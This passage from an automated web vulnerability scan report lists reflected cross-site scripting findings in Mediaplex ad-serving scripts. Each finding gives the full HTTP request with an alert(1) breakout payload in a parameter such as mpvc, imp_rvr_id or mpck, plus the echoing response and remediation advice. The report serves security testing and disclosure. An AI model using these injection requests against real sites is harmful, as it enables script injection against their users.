Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UKSPRA&cb=1745504480
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=014937087076; mojo3=17243:27909/12309:21584

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 12:39:11 GMT
Server: Apache
Last-Modified: Wed, 27 Jul 2011 11:27:52 GMT
ETag: "73b941-1166-4a90b56bffe00"
Accept-Ranges: bytes
Content-Length: 5317
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://clk.atdmt.com/go/279209216/direct;wi.300;hi.250;01;ai.228142337.230044480;ct.1/01?href=581b5";al
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("http://clk.atdmt.com/go/279209216/direct;wi.300;hi.250;01;ai.228142337.230044480;ct.1/01?href=581b5";alert(1)//e9ef16281a8");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://clk.atdmt.com/go/279209216/direct;wi.300;hi.250;01;ai.228142337.230044480;ct.1/01?href=581b5";alert(1)//e9ef1628
...[SNIP]...

2.125. http://img.mediaplex.com/content/0/17243/BC_Week_2_July_BT_300x250_G2_v4.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/17243/BC_Week_2_July_BT_300x250_G2_v4.html

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8975'%3balert(1)//e027d6e1284 was submitted in the mpvc parameter. This input was echoed as a8975';alert(1)//e027d6e1284 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/17243/BC_Week_2_July_BT_300x250_G2_v4.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F17243-118150-27909-2%3Fmpt%3D9186272&mpt=9186272&mpvc=http://clk.atdmt.com/go/279209216/direct;wi.300;hi.250;01;ai.228142337.230044480;ct.1/01?href=a8975'%3balert(1)//e027d6e1284 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UKSPRA&cb=1745504480
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=014937087076; mojo3=17243:27909/12309:21584

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 12:39:11 GMT
Server: Apache
Last-Modified: Wed, 27 Jul 2011 11:27:52 GMT
ETag: "73b941-1166-4a90b56bffe00"
Accept-Ranges: bytes
Content-Length: 5317
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://clk.atdmt.com/go/279209216/direct;wi.300;hi.250;01;ai.228142337.230044480;ct.1/01?href=a8975';al
...[SNIP]...
<a href="http://clk.atdmt.com/go/279209216/direct;wi.300;hi.250;01;ai.228142337.230044480;ct.1/01?href=a8975';alert(1)//e027d6e1284http://adfarm.mediaplex.com/ad/ck/17243-118150-27909-2?mpt=9186272" target="_blank">
...[SNIP]...

2.126. http://img.mediaplex.com/content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js [imp_rvr_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js

Issue detail

The value of the imp_rvr_id request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f26a5%3balert(1)//3183a6afcbc was submitted in the imp_rvr_id parameter. This input was echoed as f26a5;alert(1)//3183a6afcbc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js?mpck=rover.ebay.com%2Frover%2F1%2F711-131750-25707-20%2F4%3Fsiteid%3D0%26mpt%3D1312375082%26Perf_Tracker_1%3D-1%26Perf_Tracker_2%3D526736%26Perf_Tracker_3%3D1.236979%26Perf_Tracker_4%3D0%26Perf_Tracker_5%3Du%26ext_id%3D206263132783788871%26Perf_Tracker_6%3D0%26Perf_Tracker_7%3D1264%26Perf_Tracker_8%3D0%26Perf_Tracker_10%3D66647%26Perf_Tracker_9%3Dhttp%253A%252F%252Fweather.uk.msn.com%26adid%3D344372%26fcid%3D344362%26ir_DAP_I131%3D4%26ir_DAP_I132%3D1%26ir_DAP_I133%3D%26ir_DAP_I5%3D0%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D252455582138%26imp_rvr_id%3D252455582138&siteid=0&mpt=1312375082&Perf_Tracker_1=-1&Perf_Tracker_2=526736&Perf_Tracker_3=1.236979&Perf_Tracker_4=0&Perf_Tracker_5=u&ext_id=206263132783788871&Perf_Tracker_6=0&Perf_Tracker_7=1264&Perf_Tracker_8=0&Perf_Tracker_10=66647&Perf_Tracker_9=http%3A%2F%2Fweather.uk.msn.com&adid=344372&fcid=344362&ir_DAP_I131=4&ir_DAP_I132=1&ir_DAP_I133=&ir_DAP_I5=0&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=252455582138&imp_rvr_id=252455582138f26a5%3balert(1)//3183a6afcbc&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3Fq6qqqqrK8z-rqqqqqsrzPwAAAKCZmQFAmpmZmZmZAUCamZmZmZkBQEdD1vc5y9wC-HCZRD1jHzEqQTlOAAAAAJAJCAAYAQAAZAAAAAIAAAC0awgASSEBAAEAAABVU0QAR0JQACwB-gDDWvAEfhAAAQUCAQIAAAAACyUIjgAAAAA.%2Fcnd%3D%217wRZKAjXiAQQtNchGMnCBCAA%2Freferrer%3Dhttp%253A%252F%252Fweather.uk.msn.com%2Fclickenc%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9NWR&cb=320488031
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=014937087076; mojo3=17243:27909/12309:21584

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 12:41:25 GMT
Server: Apache
Last-Modified: Fri, 15 Jul 2011 22:25:49 GMT
ETag: "765a59-9f8-4a82321aab540"
Accept-Ranges: bytes
Content-Length: 4316
Content-Type: application/x-javascript

document.write( " <div id=\"foldcheck252455582138f26a5;alert(1)//3183a6afcbc\">" );
var rvr_id=252455582138f26a5;alert(1)//3183a6afcbc;
var mpserv;
var mpi="img-cdn.mediaplex.com/0/";
var mpcrgif="711/131750/83635_US_2011_Q3_Pattern_Default_300x250.jpg";
var mpck="rover.
...[SNIP]...

2.127. http://img.mediaplex.com/content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js [imp_rvr_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js

Issue detail

The value of the imp_rvr_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50b78"%3balert(1)//0f2f4574bc1 was submitted in the imp_rvr_id parameter. This input was echoed as 50b78";alert(1)//0f2f4574bc1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js?mpck=rover.ebay.com%2Frover%2F1%2F711-131750-25707-20%2F4%3Fsiteid%3D0%26mpt%3D1312375082%26Perf_Tracker_1%3D-1%26Perf_Tracker_2%3D526736%26Perf_Tracker_3%3D1.236979%26Perf_Tracker_4%3D0%26Perf_Tracker_5%3Du%26ext_id%3D206263132783788871%26Perf_Tracker_6%3D0%26Perf_Tracker_7%3D1264%26Perf_Tracker_8%3D0%26Perf_Tracker_10%3D66647%26Perf_Tracker_9%3Dhttp%253A%252F%252Fweather.uk.msn.com%26adid%3D344372%26fcid%3D344362%26ir_DAP_I131%3D4%26ir_DAP_I132%3D1%26ir_DAP_I133%3D%26ir_DAP_I5%3D0%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D252455582138%26imp_rvr_id%3D252455582138&siteid=0&mpt=1312375082&Perf_Tracker_1=-1&Perf_Tracker_2=526736&Perf_Tracker_3=1.236979&Perf_Tracker_4=0&Perf_Tracker_5=u&ext_id=206263132783788871&Perf_Tracker_6=0&Perf_Tracker_7=1264&Perf_Tracker_8=0&Perf_Tracker_10=66647&Perf_Tracker_9=http%3A%2F%2Fweather.uk.msn.com&adid=344372&fcid=344362&ir_DAP_I131=4&ir_DAP_I132=1&ir_DAP_I133=&ir_DAP_I5=0&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=252455582138&imp_rvr_id=25245558213850b78"%3balert(1)//0f2f4574bc1&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3Fq6qqqqrK8z-rqqqqqsrzPwAAAKCZmQFAmpmZmZmZAUCamZmZmZkBQEdD1vc5y9wC-HCZRD1jHzEqQTlOAAAAAJAJCAAYAQAAZAAAAAIAAAC0awgASSEBAAEAAABVU0QAR0JQACwB-gDDWvAEfhAAAQUCAQIAAAAACyUIjgAAAAA.%2Fcnd%3D%217wRZKAjXiAQQtNchGMnCBCAA%2Freferrer%3Dhttp%253A%252F%252Fweather.uk.msn.com%2Fclickenc%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9NWR&cb=320488031
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=014937087076; mojo3=17243:27909/12309:21584

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 12:41:23 GMT
Server: Apache
Last-Modified: Fri, 15 Jul 2011 22:25:49 GMT
ETag: "765a59-9f8-4a82321aab540"
Accept-Ranges: bytes
Content-Length: 4318
Content-Type: application/x-javascript

document.write( " <div id=\"foldcheck25245558213850b78";alert(1)//0f2f4574bc1\">" );
var rvr_id=25245558213850b78";alert(1)//0f2f4574bc1;
var mpserv;

...[SNIP]...

2.128. http://img.mediaplex.com/content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1ef8"%3balert(1)//edfbf2e626c was submitted in the mpck parameter. This input was echoed as e1ef8";alert(1)//edfbf2e626c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js?mpck=rover.ebay.com%2Frover%2F1%2F711-131750-25707-20%2F4%3Fsiteid%3D0%26mpt%3D1312375082%26Perf_Tracker_1%3D-1%26Perf_Tracker_2%3D526736%26Perf_Tracker_3%3D1.236979%26Perf_Tracker_4%3D0%26Perf_Tracker_5%3Du%26ext_id%3D206263132783788871%26Perf_Tracker_6%3D0%26Perf_Tracker_7%3D1264%26Perf_Tracker_8%3D0%26Perf_Tracker_10%3D66647%26Perf_Tracker_9%3Dhttp%253A%252F%252Fweather.uk.msn.com%26adid%3D344372%26fcid%3D344362%26ir_DAP_I131%3D4%26ir_DAP_I132%3D1%26ir_DAP_I133%3D%26ir_DAP_I5%3D0%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D252455582138%26imp_rvr_id%3D252455582138e1ef8"%3balert(1)//edfbf2e626c&siteid=0&mpt=1312375082&Perf_Tracker_1=-1&Perf_Tracker_2=526736&Perf_Tracker_3=1.236979&Perf_Tracker_4=0&Perf_Tracker_5=u&ext_id=206263132783788871&Perf_Tracker_6=0&Perf_Tracker_7=1264&Perf_Tracker_8=0&Perf_Tracker_10=66647&Perf_Tracker_9=http%3A%2F%2Fweather.uk.msn.com&adid=344372&fcid=344362&ir_DAP_I131=4&ir_DAP_I132=1&ir_DAP_I133=&ir_DAP_I5=0&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=252455582138&imp_rvr_id=252455582138&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3Fq6qqqqrK8z-rqqqqqsrzPwAAAKCZmQFAmpmZmZmZAUCamZmZmZkBQEdD1vc5y9wC-HCZRD1jHzEqQTlOAAAAAJAJCAAYAQAAZAAAAAIAAAC0awgASSEBAAEAAABVU0QAR0JQACwB-gDDWvAEfhAAAQUCAQIAAAAACyUIjgAAAAA.%2Fcnd%3D%217wRZKAjXiAQQtNchGMnCBCAA%2Freferrer%3Dhttp%253A%252F%252Fweather.uk.msn.com%2Fclickenc%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9NWR&cb=320488031
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=014937087076; mojo3=17243:27909/12309:21584

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 12:41:21 GMT
Server: Apache
Last-Modified: Fri, 15 Jul 2011 22:25:49 GMT
ETag: "765a59-9f8-4a82321aab540"
Accept-Ranges: bytes
Content-Length: 4320
Content-Type: application/x-javascript

document.write( " <div id=\"foldcheck252455582138\">" );
var rvr_id=252455582138;
var mpserv;
var mpi="img-cdn.mediaplex.com/0/";

...[SNIP]...
&adid=344372&fcid=344362&ir_DAP_I131=4&ir_DAP_I132=1&ir_DAP_I133=&ir_DAP_I5=0&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=252455582138&imp_rvr_id=252455582138e1ef8";alert(1)//edfbf2e626c";
var mpcke="<mpcke/>
...[SNIP]...

2.129. http://img.mediaplex.com/content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76f98"%3balert(1)//48ee27f9502 was submitted in the mpvc parameter. This input was echoed as 76f98";alert(1)//48ee27f9502 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js?mpck=rover.ebay.com%2Frover%2F1%2F711-131750-25707-20%2F4%3Fsiteid%3D0%26mpt%3D1312375082%26Perf_Tracker_1%3D-1%26Perf_Tracker_2%3D526736%26Perf_Tracker_3%3D1.236979%26Perf_Tracker_4%3D0%26Perf_Tracker_5%3Du%26ext_id%3D206263132783788871%26Perf_Tracker_6%3D0%26Perf_Tracker_7%3D1264%26Perf_Tracker_8%3D0%26Perf_Tracker_10%3D66647%26Perf_Tracker_9%3Dhttp%253A%252F%252Fweather.uk.msn.com%26adid%3D344372%26fcid%3D344362%26ir_DAP_I131%3D4%26ir_DAP_I132%3D1%26ir_DAP_I133%3D%26ir_DAP_I5%3D0%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D252455582138%26imp_rvr_id%3D252455582138&siteid=0&mpt=1312375082&Perf_Tracker_1=-1&Perf_Tracker_2=526736&Perf_Tracker_3=1.236979&Perf_Tracker_4=0&Perf_Tracker_5=u&ext_id=206263132783788871&Perf_Tracker_6=0&Perf_Tracker_7=1264&Perf_Tracker_8=0&Perf_Tracker_10=66647&Perf_Tracker_9=http%3A%2F%2Fweather.uk.msn.com&adid=344372&fcid=344362&ir_DAP_I131=4&ir_DAP_I132=1&ir_DAP_I133=&ir_DAP_I5=0&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=252455582138&imp_rvr_id=252455582138&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3Fq6qqqqrK8z-rqqqqqsrzPwAAAKCZmQFAmpmZmZmZAUCamZmZmZkBQEdD1vc5y9wC-HCZRD1jHzEqQTlOAAAAAJAJCAAYAQAAZAAAAAIAAAC0awgASSEBAAEAAABVU0QAR0JQACwB-gDDWvAEfhAAAQUCAQIAAAAACyUIjgAAAAA.%2Fcnd%3D%217wRZKAjXiAQQtNchGMnCBCAA%2Freferrer%3Dhttp%253A%252F%252Fweather.uk.msn.com%2Fclickenc%3D76f98"%3balert(1)//48ee27f9502 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9NWR&cb=320488031
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=014937087076; mojo3=17243:27909/12309:21584

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 12:41:27 GMT
Server: Apache
Last-Modified: Fri, 15 Jul 2011 22:25:49 GMT
ETag: "765a59-9f8-4a82321aab540"
Accept-Ranges: bytes
Content-Length: 4320
Content-Type: application/x-javascript

document.write( " <div id=\"foldcheck252455582138\">" );
var rvr_id=252455582138;
var mpserv;
var mpi="img-cdn.mediaplex.com/0/";

...[SNIP]...
QEdD1vc5y9wC-HCZRD1jHzEqQTlOAAAAAJAJCAAYAQAAZAAAAAIAAAC0awgASSEBAAEAAABVU0QAR0JQACwB-gDDWvAEfhAAAQUCAQIAAAAACyUIjgAAAAA./cnd=!7wRZKAjXiAQQtNchGMnCBCAA/referrer=http%3A%2F%2Fweather.uk.msn.com/clickenc=76f98";alert(1)//48ee27f9502";
var bangmpvc="http%3A%2F%2Fib.adnxs.com%2Fclick%3Fq6qqqqrK8z-rqqqqqsrzPwAAAKCZmQFAmpmZmZmZAUCamZmZmZkBQEdD1vc5y9wC-HCZRD1jHzEqQTlOAAAAAJAJCAAYAQAAZAAAAAIAAAC0awgASSEBAAEAAABVU0QAR0JQ
...[SNIP]...

2.130. http://img.mediaplex.com/content/0/711/131750/83823_US_2011_Q3_BTS_300x250.js [imp_rvr_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/131750/83823_US_2011_Q3_BTS_300x250.js

Issue detail

The value of the imp_rvr_id request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2b14b%3balert(1)//5a1cc938cb5 was submitted in the imp_rvr_id parameter. This input was echoed as 2b14b;alert(1)//5a1cc938cb5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/711/131750/83823_US_2011_Q3_BTS_300x250.js?mpck=rover.ebay.com%2Frover%2F1%2F711-131750-25707-20%2F4%3Fsiteid%3D0%26mpt%3D1312375856%26Perf_Tracker_1%3D-1%26Perf_Tracker_2%3D526736%26Perf_Tracker_3%3D1.441240%26Perf_Tracker_4%3D0%26Perf_Tracker_5%3Du%26ext_id%3D4452179138624526041%26Perf_Tracker_6%3D7%26Perf_Tracker_7%3D1264%26Perf_Tracker_8%3D0%26Perf_Tracker_10%3D66647%26Perf_Tracker_9%3Dhttp%253A%252F%252Fweather.uk.msn.com%26adid%3D344372%26fcid%3D344362%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D8fb2381d1310a0aa178150b1ff970218501a77a7%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D252456491190%26imp_rvr_id%3D252456491190&siteid=0&mpt=1312375856&Perf_Tracker_1=-1&Perf_Tracker_2=526736&Perf_Tracker_3=1.441240&Perf_Tracker_4=0&Perf_Tracker_5=u&ext_id=4452179138624526041&Perf_Tracker_6=7&Perf_Tracker_7=1264&Perf_Tracker_8=0&Perf_Tracker_10=66647&Perf_Tracker_9=http%3A%2F%2Fweather.uk.msn.com&adid=344372&fcid=344362&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=8fb2381d1310a0aa178150b1ff970218501a77a7&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=252456491190&imp_rvr_id=2524564911902b14b%3balert(1)//5a1cc938cb5&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FHf6arFEP9z8d_pqsUQ_3PwAAAKCZmQFA_yCSIccW9z__IJIhxxb3P9mWHoJWUck98i-2cBjVGG0wRDlOAAAAAJAJCAAYAQAAZAAAAAIAAAC0awgASSEBAAEAAABVU0QAR0JQACwB-gDDWvAEPAsAAQUCAQIAAAAAPiJNSwAAAAA.%2Fcnd%3D%217wRZKAjXiAQQtNchGMnCBCAA%2Freferrer%3Dhttp%253A%252F%252Fweather.uk.msn.com%2Fclickenc%3D HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9NWR&cb=1377845577

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 12:52:16 GMT
Server: Apache
Last-Modified: Fri, 22 Jul 2011 17:18:33 GMT
ETag: "74a6-9d4-4a8aba7af4c40"
Accept-Ranges: bytes
Content-Length: 4362
Content-Type: application/x-javascript

document.write( " <div id=\"foldcheck2524564911902b14b;alert(1)//5a1cc938cb5\">" );
var rvr_id=2524564911902b14b;alert(1)//5a1cc938cb5;
var mpserv;
var mpi="img-cdn.mediaplex.com/0/";
var mpcrgif="711/131750/83823_US_2011_Q3_BTS_300x250.jpg";
var mpck="rover.ebay.com/rov
...[SNIP]...

2.131. http://img.mediaplex.com/content/0/711/131750/83823_US_2011_Q3_BTS_300x250.js [imp_rvr_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/131750/83823_US_2011_Q3_BTS_300x250.js

Issue detail

The value of the imp_rvr_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdb86"%3balert(1)//a9fa3264758 was submitted in the imp_rvr_id parameter. This input was echoed as bdb86";alert(1)//a9fa3264758 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/711/131750/83823_US_2011_Q3_BTS_300x250.js?mpck=rover.ebay.com%2Frover%2F1%2F711-131750-25707-20%2F4%3Fsiteid%3D0%26mpt%3D1312375856%26Perf_Tracker_1%3D-1%26Perf_Tracker_2%3D526736%26Perf_Tracker_3%3D1.441240%26Perf_Tracker_4%3D0%26Perf_Tracker_5%3Du%26ext_id%3D4452179138624526041%26Perf_Tracker_6%3D7%26Perf_Tracker_7%3D1264%26Perf_Tracker_8%3D0%26Perf_Tracker_10%3D66647%26Perf_Tracker_9%3Dhttp%253A%252F%252Fweather.uk.msn.com%26adid%3D344372%26fcid%3D344362%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D8fb2381d1310a0aa178150b1ff970218501a77a7%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D252456491190%26imp_rvr_id%3D252456491190&siteid=0&mpt=1312375856&Perf_Tracker_1=-1&Perf_Tracker_2=526736&Perf_Tracker_3=1.441240&Perf_Tracker_4=0&Perf_Tracker_5=u&ext_id=4452179138624526041&Perf_Tracker_6=7&Perf_Tracker_7=1264&Perf_Tracker_8=0&Perf_Tracker_10=66647&Perf_Tracker_9=http%3A%2F%2Fweather.uk.msn.com&adid=344372&fcid=344362&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=8fb2381d1310a0aa178150b1ff970218501a77a7&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=252456491190&imp_rvr_id=252456491190bdb86"%3balert(1)//a9fa3264758&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FHf6arFEP9z8d_pqsUQ_3PwAAAKCZmQFA_yCSIccW9z__IJIhxxb3P9mWHoJWUck98i-2cBjVGG0wRDlOAAAAAJAJCAAYAQAAZAAAAAIAAAC0awgASSEBAAEAAABVU0QAR0JQACwB-gDDWvAEPAsAAQUCAQIAAAAAPiJNSwAAAAA.%2Fcnd%3D%217wRZKAjXiAQQtNchGMnCBCAA%2Freferrer%3Dhttp%253A%252F%252Fweather.uk.msn.com%2Fclickenc%3D HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9NWR&cb=1377845577

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 12:52:14 GMT
Server: Apache
Last-Modified: Fri, 22 Jul 2011 17:18:33 GMT
ETag: "74a6-9d4-4a8aba7af4c40"
Accept-Ranges: bytes
Content-Length: 4364
Content-Type: application/x-javascript

document.write( " <div id=\"foldcheck252456491190bdb86";alert(1)//a9fa3264758\">" );
var rvr_id=252456491190bdb86";alert(1)//a9fa3264758;
var mpserv;

...[SNIP]...

2.132. http://img.mediaplex.com/content/0/711/131750/83823_US_2011_Q3_BTS_300x250.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
